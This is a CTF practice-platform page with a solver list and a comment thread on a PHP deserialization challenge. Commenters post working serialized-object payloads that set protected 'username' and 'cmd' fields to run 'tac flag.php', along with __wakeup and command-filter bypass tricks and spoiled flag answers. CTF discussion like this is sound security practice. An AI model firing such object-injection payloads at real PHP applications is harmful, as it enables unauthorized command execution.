评分(4)
解题动态
Mori. 攻破了该题 2天前
乱来小木 攻破了该题 4天前
hdcc1 攻破了该题 5天前
qq1002517 攻破了该题 6天前
flag大王 攻破了该题 9天前
xiaoxiaojiangshi 攻破了该题 11天前
shuiniu221 攻破了该题 12天前
2838932518 攻破了该题 14天前
scv 攻破了该题 14天前
klfx1913 攻破了该题 15天前
等往事风中吹‘ 攻破了该题 15天前
WindZQ 攻破了该题 16天前
木木夕 攻破了该题 16天前
ctfldc 攻破了该题 19天前
AzKanna 攻破了该题 25天前
Fbug 攻破了该题 26天前
SkyAsh 攻破了该题 26天前
t0ur1st 攻破了该题 27天前
luck1219 攻破了该题 29天前
评论
harry2025 1月前
举报
http://171.80.2.169:14918?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
陈亮 1月前
举报
flag{***}
网恋秀牛子被录屏导致自卑 1月前
举报
执行命令时,我用的“cp flag.php flag.txt”绕过,这样的话就复制了文件,然后直接访问flag.txt就行,屏幕输出NULL是因为这个命令没有输出的,但执行了。
admit 5月前
举报
/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}
iNMB 7月前
举报
此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。
iNMB 7月前
举报
绕过__wakeup()后使用tac等其他输出字符的命令即可
llc123 9月前
举报
c\at flag.php也行
pezn1and 9月前
举报
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
zbss 10月前
举报
备份网站没有文件,环境出问题了吧,退钱,我还试了两次
iamblue 12月前
举报
O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D